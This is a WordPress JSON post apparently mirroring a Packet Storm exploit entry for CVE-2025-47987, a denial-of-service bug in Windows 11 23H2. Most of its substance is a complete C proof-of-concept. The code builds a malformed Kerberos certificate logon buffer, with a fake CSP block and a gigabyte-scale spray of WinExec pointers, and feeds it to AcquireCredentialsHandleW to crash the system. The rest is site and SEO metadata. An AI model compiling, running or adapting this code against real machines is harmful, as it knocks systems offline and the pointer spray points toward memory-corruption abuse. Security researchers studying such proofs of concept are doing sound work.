{"id":51611,"date":"2026-05-05T17:49:18","date_gmt":"2026-05-05T17:49:18","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=51611"},"modified":"2026-05-05T17:49:18","modified_gmt":"2026-05-05T17:49:18","slug":"microsoft-windows-11-23h2-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=51611","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-05T22:00:05&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 11 23H2 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220388&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-47987&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Windows 11 23H2 &#8211; Denial of Service (DoS)\\n    # Google Dork: N\/A\\n    # Date: 2025-08-22\\n    # Exploit Author: Kryptoenix\\n    # Vendor Homepage: https:\/\/www.microsoft.com\/\\n    # Software Link: https:\/\/www.microsoft.com\/en-us\/software-download\/windows11\\n    # Version: Windows 11 23H2\\n    # Tested on: Windows 11 23H2 (x64)\\n    # CVE: CVE-2025-47987\\n    \\n    \\n    \\n    #define SECURITY_WIN32\\n    #include \\u003cwindows.h\\u003e\\n    #include \\u003csspi.h\\u003e\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    #include \\u003cstring.h\\u003e\\n    #include \\u003ccredssp.h\\u003e\\n    #include \\u003cstdint.h\\u003e\\n    #include \\u003cwchar.h\\u003e\\n    \\n    #pragma comment(lib, \\&#8221;secur32.lib\\&#8221;)\\n    \\n    \\n    #define ALIGN_TO_8(x) (((x) + 7) \\u0026 ~((size_t)7))\\n    \\n    \\n    int BuildKerbCertLogonBuffer(\\n        const WCHAR* username,\\n        const WCHAR* domain,\\n        const WCHAR* password,\\n        const BYTE* certBlob,\\n        DWORD certBlobSize,\\n        BYTE** outBuffer,\\n        DWORD* outBufferSize)\\n    {\\n        if (!username || !domain || !password || !certBlob || !outBuffer || !outBufferSize) return -1;\\n    \\n        uint64_t usernameLen = (uint64_t)(wcslen(username) * sizeof(WCHAR));\\n        uint64_t domainLen = (uint64_t)(wcslen(domain) * sizeof(WCHAR));\\n        uint64_t passwordLen = (uint64_t)(wcslen(password) * sizeof(WCHAR));\\n    \\n        size_t offsetUser = 0x48; \/\/ header is fixed 0x48 bytes\\n        size_t offsetPassword = offsetUser + ALIGN_TO_8(usernameLen);\\n        size_t offsetDomain = offsetPassword + ALIGN_TO_8(passwordLen);\\n        size_t offsetCert = offsetDomain + ALIGN_TO_8(domainLen);\\n    \\n        size_t totalSize = offsetCert + ALIGN_TO_8(certBlobSize);\\n    \\n        BYTE* buf = (BYTE*)malloc(totalSize);\\n        if (!buf) return -1;\\n        memset(buf, 0, totalSize);\\n    \\n        \/\/ 0x00: type\\n        *(uint64_t*)(buf + 0x00) = 13ULL;\\n    \\n        \/\/ username entry\\n        *(uint64_t*)(buf + 0x08) = usernameLen;\\n        *(uint64_t*)(buf + 0x10) = (uint64_t)offsetUser;\\n    \\n        \/\/ password entry\\n        *(uint64_t*)(buf + 0x18) = passwordLen;\\n        *(uint64_t*)(buf + 0x20) = (uint64_t)offsetPassword;\\n    \\n        \/\/ domain entry\\n        *(uint64_t*)(buf + 0x28) = domainLen;\\n        *(uint64_t*)(buf + 0x30) = (uint64_t)offsetDomain;\\n    \\n        \/\/ cert offset\/size\\n        *(uint32_t*)(buf + 0x38) = (uint32_t)0x1337; \/\/ :)\\n        *(uint32_t*)(buf + 0x3C) = (uint32_t)certBlobSize;\\n        *(uint32_t*)(buf + 0x40) = (uint32_t)offsetCert;\\n    \\n        \/\/ payload copies\\n        memcpy(buf + offsetUser, username, usernameLen);\\n        memcpy(buf + offsetPassword, password, passwordLen);\\n        memcpy(buf + offsetDomain, domain, domainLen);\\n        memcpy(buf + offsetCert, certBlob, certBlobSize);\\n    \\n        printf(\\&#8221;\\\\nHeader of packed buffer (first 64 bytes):\\\\n\\&#8221;);\\n        for (size_t i = 0; i \\u003c (totalSize \\u003c 64 ? totalSize : 64); ++i) {\\n            printf(\\&#8221;%02x \\&#8221;, buf[i]);\\n            if ((i \\u0026 0x7) == 0x7) printf(\\&#8221;\\\\n\\&#8221;);\\n        }\\n        printf(\\&#8221;\\\\n\\&#8221;);\\n    \\n    \\n        *outBuffer = buf;\\n        *outBufferSize = (DWORD)totalSize;\\n        return 0;\\n    }\\n    \\n    BYTE* BuildFakeCspData(\\n        const char* str,       \\n        size_t strLen,\\n        DWORD providerValue,   \/\/ stored at header[5]\\n        DWORD* outSize)        \\n    {\\n        if (!str) return NULL;\\n    \\n        size_t lenChars = strLen + 1; \\n        size_t stringBytes = lenChars;     \\n    \\n        size_t headerBytes = 44; \/\/ 40-byte base + one DWORD offset\\n        size_t totalBytes = headerBytes + stringBytes;\\n        if (totalBytes \\u003c 0x30) totalBytes = 0x30;\\n    \\n        BYTE* buffer = (BYTE*)malloc(totalBytes);\\n        if (!buffer) return NULL;\\n        memset(buffer, 0, totalBytes);\\n    \\n        \/\/ header[5] = providerValue\\n        ((DWORD*)buffer)[5] = providerValue;\\n    \\n        \/\/ header[6] = offset for string (in bytes from start of data area)\\n        ((DWORD*)buffer)[6] = 0;\\n    \\n        \/\/ copy the string into the data area\\n        BYTE* stringArea = buffer + headerBytes;\\n        memcpy(stringArea, str, lenChars); \\n    \\n        printf(\\&#8221;Header of CSP buffer (first 44 bytes):\\\\n\\&#8221;);\\n        for (size_t i = 0; i \\u003c headerBytes; ++i) {\\n            printf(\\&#8221;%02x \\&#8221;, buffer[i]);\\n            if ((i \\u0026 0x7) == 0x7) printf(\\&#8221;\\\\n\\&#8221;);\\n        }\\n        printf(\\&#8221;\\\\n\\\\n\\&#8221;);\\n    \\n    \\n        if (outSize)\\n            *outSize = (DWORD)totalBytes;\\n    \\n        return buffer;\\n    }\\n    \\n    \\n    unsigned char* ptrToBytes(void* ptr, size_t* outLen) {\\n        size_t len = sizeof(void*); \/\/ 8 bytes \\n        unsigned char* buf = (unsigned char*)malloc(len);\\n        if (!buf) return NULL;\\n        memcpy(buf, \\u0026ptr, len); \/\/ copy pointer value into buffer\\n        if (outLen) *outLen = len;\\n        return buf;\\n    }\\n    \\n    unsigned char* BuildStringPattern(const unsigned char* pattern, size_t patLen, size_t repeatCount) {\\n        size_t totalLen = patLen * repeatCount;\\n        unsigned char* buf = (unsigned char*)malloc(totalLen);\\n        if (!buf) return NULL;\\n    \\n        \/\/ add padding for pointer allignment\\n        memset(buf, 0, 4);\\n    \\n        unsigned char* p = buf + 4;\\n        for (size_t i = 0; i \\u003c repeatCount; i++) {\\n            memcpy(p, pattern, patLen);\\n            p += patLen;\\n        }\\n        return buf;\\n    }\\n    \\n    wchar_t* BuildWideStringPattern(const wchar_t* pattern, size_t repeatCount) {\\n        if (!pattern || repeatCount == 0) return NULL;\\n    \\n        size_t patLen = wcslen(pattern); \\n        size_t totalLen = (patLen * repeatCount) + 1; \\n    \\n        wchar_t* buf = (wchar_t*)malloc(totalLen * sizeof(wchar_t));\\n        if (!buf) return NULL;\\n    \\n        wchar_t* p = buf;\\n    \\n        \/\/ copy pattern repeatedly\\n        for (size_t i = 0; i \\u003c repeatCount; i++) {\\n            wmemcpy(p, pattern, patLen);\\n            p += patLen;\\n        }\\n    \\n        *p = L&#8217;\\\\0&#8242;;\\n    \\n        return buf;\\n    }\\n    int main(void)\\n    {\\n        size_t addrLen;\\n        unsigned char* addrBytes = ptrToBytes((void*)WinExec, \\u0026addrLen);\\n        if (!addrBytes) {\\n            fprintf(stderr, \\&#8221;Failed to allocate address bytes.\\\\n\\&#8221;);\\n            return 1;\\n        }\\n    \\n    \\n        size_t repeatCount = 0x1FFFFFE0; \/\/ 0xFFFFFF00 = 8 * 0x1FFFFFE0\\n        unsigned char* hugeStr = BuildStringPattern(addrBytes, addrLen, repeatCount);\\n        if (!hugeStr) {\\n            fprintf(stderr, \\&#8221;Failed to allocate huge buffer.\\\\n\\&#8221;);\\n            free(addrBytes);\\n            return 1;\\n        }\\n    \\n        DWORD fakeSize;\\n        printf(\\&#8221;Building fake CSP buffer&#8230;\\\\n\\\\n\\&#8221;);\\n        BYTE* fakeCsp = BuildFakeCspData((const char *)hugeStr, 0xFFFFFF00, 0x18, \\u0026fakeSize);\\n    \\n        if (!fakeCsp) {\\n            wprintf(L\\&#8221;Allocation failed\\\\n\\&#8221;);\\n            return 1;\\n        }\\n    \\n        wprintf(L\\&#8221;Built fake CSPDATA size=0x%X\\\\n\\\\n\\&#8221;, fakeSize);\\n        \/\/getchar();\\n    \\n        SECURITY_STATUS status;\\n        CredHandle credHandle;\\n        TimeStamp expiry;\\n    \\n        const WCHAR* username = L\\&#8221;exampleusername\\&#8221;;\\n        const WCHAR* domain = L\\&#8221;exampledomain\\&#8221;;\\n        const WCHAR* password = L\\&#8221;examplepassexamplepassexamplepassexamplepassexamplepass\\&#8221;;   \\n        \\n    \\n        BYTE* buf = NULL;\\n        DWORD bufSize = 0;\\n    \\n        printf(\\&#8221;Building fake KerbCertLogonBuffer&#8230;\\\\n\\&#8221;);\\n        if (BuildKerbCertLogonBuffer(username, domain, password, fakeCsp, fakeSize, \\u0026buf, \\u0026bufSize) != 0) {\\n            printf(\\&#8221;Failed to build KerbCertLogonBuffer\\\\n\\&#8221;);\\n            return 1;\\n        }\\n    \\n        printf(\\&#8221;Trigerring the bug&#8230;\\\\n\\&#8221;);\\n        status = AcquireCredentialsHandleW(\\n            NULL,\\n            (LPWSTR)L\\&#8221;TSSSP\\&#8221;,       \/\/ pszPackage (name of the security package)\\n            SECPKG_CRED_OUTBOUND,   \\n            NULL,\\n            buf,                    \/\/ pAuthData (pointer to authentication data)\\n            NULL,\\n            NULL,\\n            \\u0026credHandle,\\n            \\u0026expiry\\n        );\\n    \\n        if (status == SEC_E_OK) {\\n            printf(\\&#8221;AcquireCredentialsHandle succeeded\\\\n\\&#8221;);\\n            FreeCredentialsHandle(\\u0026credHandle);\\n        }\\n        else {\\n    \\n            if (status == SEC_E_INSUFFICIENT_MEMORY) {\\n                printf(\\&#8221;Not enough memory to trigger the crash :(\\\\n\\&#8221;);\\n                printf(\\&#8221;[-] PoC failed!\\\\n\\&#8221;);\\n            }\\n            else if (status == SEC_E_INTERNAL_ERROR) {\\n                printf(\\&#8221;\\\\n[+] PoC succeded! Enjoy the crash \\u003e:D\\\\n\\&#8221;);\\n            }\\n            else {\\n                printf(\\&#8221;AcquireCredentialsHandle failed! Error: 0x%x\\\\n\\&#8221;,status);\\n                printf(\\&#8221;[-] PoC failed!\\\\n\\&#8221;);\\n            }\\n        }\\n    \\n        if (buf) free(buf);\\n        if(hugeStr) free(hugeStr);\\n        if(fakeCsp) free(fakeCsp);\\n        return 0;\\n    }&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/220388&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/220388\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-05T22:00:05&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 11 23H2 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220388&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-47987&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Windows 11 23H2 &#8211; Denial&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-51611","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=51611\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-05T22:00:05&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 11 23H2 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220388&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-47987&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Windows 11 23H2 &#8211; Denial...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=51611\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-05T17:49:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388\",\"datePublished\":\"2026-05-05T17:49:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611\"},\"wordCount\":1294,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=51611#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611\",\"name\":\"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-05T17:49:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=51611\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=51611#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=51611","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-05T22:00:05&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 11 23H2 suffers from a denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-05T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220388&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-47987&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Windows 11 23H2 &#8211; Denial...","og_url":"https:\/\/zero.redgem.net\/?p=51611","og_site_name":"zero redgem","article_published_time":"2026-05-05T17:49:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=51611#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=51611"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388","datePublished":"2026-05-05T17:49:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=51611"},"wordCount":1294,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=51611#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=51611","url":"https:\/\/zero.redgem.net\/?p=51611","name":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-05T17:49:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=51611#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=51611"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=51611#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/51611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=51611"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/51611\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=51611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=51611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=51611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}